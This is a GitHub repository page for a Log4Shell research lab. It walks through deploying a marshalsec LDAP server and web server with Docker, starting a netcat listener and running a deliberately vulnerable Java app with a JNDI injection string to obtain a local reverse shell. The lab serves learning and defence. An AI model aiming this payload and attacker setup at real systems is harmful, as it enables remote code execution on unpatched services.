Skip to content

zeroonesa/ctf_log4jshell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

Log4j RCE Research Lab 🚧

A basic research lab to learn more about Log4Shell:

Used By

Deploy LDAP Reference & Web Servers

Clone Repo

sudo su
git clone https://github.com/zeroonesa/ctf_log4jshell

Run Docker Compose File

cd ctf_log4jshell
docker-compose -f MarshalsecLDAP-NginxWebServer.yml up --build -d

Check Docker Containers

docker ps

docker logs --follow ldap-server
docker logs --follow web-server

Run Basic Test

This scenario simulates an attacker using the log4j RCE vulnerability to get a shell locally (127.0.0.1) via netcat. We are going to execute everything on the same endpoint where we deployed our attacker's infrastructure.

Start Netcat Server

nc -lvnp 443

Compile Basic JAR

Docker

cd vulnApps/basicJar
docker run -it --rm -v "$(pwd)":/opt/maven -w /opt/maven maven mvn clean install

Manual

cd vulnApps/basicJar
mvn -f pom.xml clean package -DskipTests

Run Application

cd vulnApps/basicJar
java -cp target/Log4jLabProject-1.0-SNAPSHOT-all.jar com.log4jshell.App '${jndi:ldap://127.0.0.1:1389/Run}'

Security Datasets

References

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published